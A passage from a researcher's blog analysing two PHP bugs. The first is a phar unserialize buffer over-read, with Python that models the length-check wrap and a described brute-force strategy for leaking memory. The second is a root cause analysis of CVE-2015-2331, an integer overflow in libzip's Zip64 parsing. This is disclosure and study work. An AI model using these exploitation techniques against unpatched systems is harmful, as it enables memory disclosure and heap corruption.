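def length_check_passes(cursor, limit, length):
    """Model of `maxlen = max - YYCURSOR; if (maxlen < len) return 0;`."""
    maxlen = (limit - cursor) & SIZE_T_MASK  # unsigned subtraction wraps
    return not (maxlen < length)


limit = 0x1000  # hypothetical value of p + buf_len

# Cursor still inside the buffer: an oversized <len> is rejected.
print(length_check_passes(0x0FF0, limit, 0x100))     # False

# Cursor 4 bytes past the limit: maxlen wraps to a huge value,
# so even a very large <len> is accepted.
print(length_check_passes(0x1004, limit, 0x100000))  # True
```

Once the cursor is past the limit, maxlen is close to 2^64, so no realistic <len> can fail the comparison.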

There's also some format checks:

 900 	if (yych != '"') goto yy18;
     ....
 915 	YYCURSOR += len;
 916 
 917 	if (*(YYCURSOR) != '"') {
 918 		*p = YYCURSOR;
 919 		return 0;
 920 	}

Lines 900 and 915 to 920 check the data format for the tokens as highlighted:  s:<len>:"<Data>"



In essence, what this means is that once YYCURSOR goes beyond max when extracting <len>, <len> can be as large a number as you want and it will unserialize to a string successfully as long as it's in the format  s:<len>:"<Data>"

This is the state you want memory to be in during exploitation:





At this point one might ask, how do we ensure that the ending byte is " since it's in a memory region beyond our control? Well, you have a 1 in 256 chance of striking gold. But one possible way to exploit it is just to keep "hammering" the various values of xxxxxxxxxxxx. Sooner or later you will encounter a ".

One might also ask, why can't I trigger this buffer over-read through a typical unserialize call? For example, why can't we trigger it via unserialize("s:0010") plus some heap massaging? Why is it only vulnerable when we unserialize through phar?
  • The reason is that when we do a typical unserialize(), we are passing in a string. In PHP, a string is always null terminated. So essentially you are passing in s:0110\0 . Even if we massage the heap such that :" appears immediately after the string, it still wouldn't unserialize properly as the null byte breaks the unserializing process.
  • In Phar, the attacker controls the data immediately past p + buf_len as it is still part of the phar file.


Here's a screenshot of successful exploitation leaking memory, Heartbleed style:



After Thoughts

I exploited this by using a serialized string type. It would be interesting to see if we can get code execution using other types.

The full bug report can be found here

CVE-2015-2331: ZIP Integer Overflow Root Cause Analysis

posted Apr 1, 2015, 12:52 AM by Emmanuel Law   [ updated Apr 1, 2015, 3:23 AM]

I was fuzzing PHP zip extension and found the first crash on the 28th day. Sure took me a while.

The vulnerability is an integer overflow when parsing Zip64 on zip_dirent.c:113:

else if ((cd->entry=(struct zip_entry *)malloc(sizeof(*(cd->entry))*(size_t)nentry)) == NULL) {

nentry is obtained from the zip file. On my x64 machine, sizeof(*(cd->entry)) = 0x20 bytes. Thus when nentry > 0x7FFFFFFFFFFFFFF, this results in an integer overflow and malloc allocates less memory than required.
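The threshold can be verified with a few lines of Python. This is a sketch that assumes a 64-bit size_t and the 0x20-byte entry size quoted above; malloc_request is a hypothetical helper name.

```python
SIZE_T_BITS = 64   # assumption: size_t is 64 bits wide
ENTRY_SIZE = 0x20  # sizeof(*(cd->entry)) as measured in this post


def malloc_request(nentry):
    """Bytes actually requested by malloc(sizeof(entry) * nentry)."""
    return (ENTRY_SIZE * nentry) % (1 << SIZE_T_BITS)


print(hex(malloc_request(0x7FFFFFFFFFFFFFF)))  # 0xffffffffffffffe0
print(hex(malloc_request(0x800000000000000)))  # 0x0
print(hex(malloc_request(0x800000000000001)))  # 0x20
```

The largest value that does not wrap is 0x7FFFFFFFFFFFFFF. One past it, the product is exactly 2^64 and wraps to 0, and with one more entry the request is only 0x20 bytes while the loop still intends to initialise the full nentry entries.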

Further down in zip_dirent.c:119

for (i=0; i<nentry; i++)	_zip_entry_init(cd->entry+i);

_zip_entry_init() is called in a loop to write to the allocated memory. This goes on and on until it writes past the end of the allocated memory on the heap.

The most likely reason it took 28 days of fuzzing to find this is because of zip_open.c:113

 
    /* number of cdir-entries on this disk */
    i = _zip_read2(&cdp);
    /* number of cdir-entries */
    nentry = _zip_read2(&cdp);

    if (nentry != i) {
	_zip_error_set(error, ZIP_ER_NOZIP, 0);

i = total number of entries in the central directory on this disk
nentry = total number of entries in the central directory

Random bit flipping needs to flip both the i and nentry fields to the same overflowing value before going down the crash path.


After reporting this bug, I realized that it has wider implications, as this is a bug in libzip. PHP is naturally affected as it has an embedded (and modified) version of libzip in its code.

Full bug report can be found here.